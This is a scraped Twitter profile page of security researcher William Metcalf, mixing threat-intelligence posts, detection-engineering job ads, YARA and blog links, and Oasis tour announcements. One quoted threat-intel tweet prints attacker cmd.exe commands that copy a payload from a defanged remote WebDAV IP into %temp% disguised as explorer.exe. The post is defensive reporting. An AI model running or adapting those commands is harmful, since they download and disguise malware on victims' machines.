William Metcalf (@node5) 's Twitter Profile
William Metcalf

@node5

I have been recruited by the Star League to defend the Frontier against Xur and the Ko-dan Armada

ID: 56388460

13-07-2009 14:39:29

1,1K Tweet

1,1K Followers

391 Following

Josh Stroschein | The Cyber Yeti (@jstrosch)

I've hosted several malware analysis workshops over the past few years, I've collected those on YouTube and added to the following playlist 👇 youtube.com/playlist?list=… Samples from the workshops have been archived on Github: 👉 github.com/jstrosch/malwa…

Threat Insight (@threatinsight)

Example commands to copy files included: cmd.exe /c "extrac32 /Y /C \\64.52.80[.]221@80\udXyzMes\jquery %temp%\explorer.exe cmd.exe /c "findstr /V /L egwwge \\64.52.80[.]221@80\QUnsVajK\jquery > %temp%\explorer.exe cmd.exe /c "type \\64.52.80[.]221@80\FkFiTPvB\jquery >

Nick Carr (@itsreallynick)

We are scouting for reverse engineering talent to contribute to Microsoft’s intelligence mission: jobs.careers.microsoft.com/global/en/job/… I can’t guarantee you will understand the vast security data, but I can promise you will often be the first human defender to ever look at a certain malicious

Jack (@malwareforme)

new role opened for someone who loves crafting detections, threat intel, and all the goodness of smashing bad in email: jobs.careers.microsoft.com/global/en/job/… happy to answer any questions

The Haag™ (@m_haggis)

🎉 Updated ASRGEN🚨 If you haven't been following along, Microsoft recently added two new ASR rules in preview. - Block rebooting machine in Safe Mode (preview) - Block use of copied or impersonated system tools (preview) 1. learn.microsoft.com/en-us/microsof… 2. learn.microsoft.com/en-us/microsof…

Gootloader (@gootloader)

On 14 Mar 2024 around 2115 UTC, #Gootloader changed the #JavaScript library it hides in to Apache ECharts. The zip changed from around 720 KB to 5 MB. The .JS inside is now 22.5 MB. Created a new #YARA rule to detect it github.com/GootloaderSite…

Jose Enrique Hernandez (@_josehelps)

Extremely proud of splunk.com/en_us/blog/sec… the latest blog on #WINELOADER by Br3akp0int The Haag™ and the #STRT team. My favorite things are: ⛓️ Super simple to understand the attack chain 🚗 [cue meme] this puppy fits soo many #atomicredteam tests 🛡️ Splunk detections! 1/x

Br3akp0int (@tccontre18)

Happy to share this #STRT blog focusing on how attackers weaponized .LNK files in several phishing campaigns. In this blog we analyzed several malicious LNK to extract TTPs for #detections and #simulation dev. Enjoy reading! #int3 #splunk #cisco splunk.com/en_us/blog/sec…

Variety (@variety)

Liam and Noel Gallagher seemingly confirmed that an Oasis reunion is happening after sharing a cryptic clip on social media on Sunday. variety.com/2024/music/new…

Oasis (@oasis)

“This is it, this is happening” Tickets on sale this Saturday 31st August (🇮🇪8AM IST / 🇬🇧9AM BST) Dates: Cardiff Principality Stadium - 4th/5th July Manchester Heaton Park - 11th/12th/19th/20th July London Wembley Stadium - 25th/26th July & 2nd/3rd August Edinburgh Scottish Gas

Oasis (@oasis)

“America. Oasis is coming. You have one last chance to prove that you loved us all along.” Oasis will tour North America in 2025! Register for the North American ticket pre-sale private ballot 👉OasisMusic.lnk.to/L25NAmPS The pre-sale will take place Thursday, 3rd October. Tickets

William Metcalf (@node5)

For the 2 people who probably care I took a stab at adding cert validation, SAN extraction, and missing/invalid certs. github.com/wmetcalf/rdp_h…

William Metcalf (@node5)

Enjoy punching phish? Experience writing detections for phish, using regex, Yara, etc., and looking to grow as a researcher within an experienced team? Join me and the rest of the Splunk Attack Analyzer Misfits of Detection Science. US only, fully remote splunk.com/en_us/careers/…

Splunk (@splunk)

Talk about ending the week on a high note. 🎉 With Cisco's acquisition of SnapAttack now complete, we're looking forward to driving further Splunk innovation as we continue to deliver security solutions that support today's new era of SIEM. Read more here. #SplunkSecurity